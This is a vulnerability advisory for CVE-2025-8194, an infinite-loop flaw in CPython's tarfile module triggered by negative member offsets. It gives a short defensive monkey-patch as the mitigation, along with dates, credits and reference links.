CVE-2025-8194
Tarfile infinite loop during parsing with negative member offset
We use these services and cookies to improve your user experience. You may opt out if you wish, however, this may limit some features on this site.
Please see our statement on Data Privacy.
Tarfile infinite loop during parsing with negative member offset
There is a defect in the CPython “tarfile” module affecting the “TarFile” extraction and entry enumeration APIs. The tar implementation would process tar archives with negative offsets without error, resulting in an infinite loop and deadlock during the parsing of maliciously crafted tar archives. This vulnerability can be mitigated by including the following patch after importing the “tarfile” module: import tarfile def _block_patched(self, count): if count < 0: # pragma: no cover raise tarfile.InvalidHeaderError("invalid offset") return _block_patched._orig_block(self, count) _block_patched._orig_block = tarfile.TarInfo._block tarfile.TarInfo._block = _block_patched
Reserved 2025-07-25 | Published 2025-07-28 | Updated 2025-07-28 | Assigner PSFCWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
Alexander Urieles
Seth Larson
Ethan Furman
Steve Dower
github.com/python/cpython/issues/130577
github.com/python/cpython/pull/137027
mail.python.org/.../thread/ZULLF3IZ726XP5EY7XJ7YIN3K5MDYR2D/
github.com/...ommit/7040aa54f14676938970e10c5f74ea93cd56aa38
github.com/...ommit/cdae923ffe187d6ef916c0f665a31249619193fe
Support options
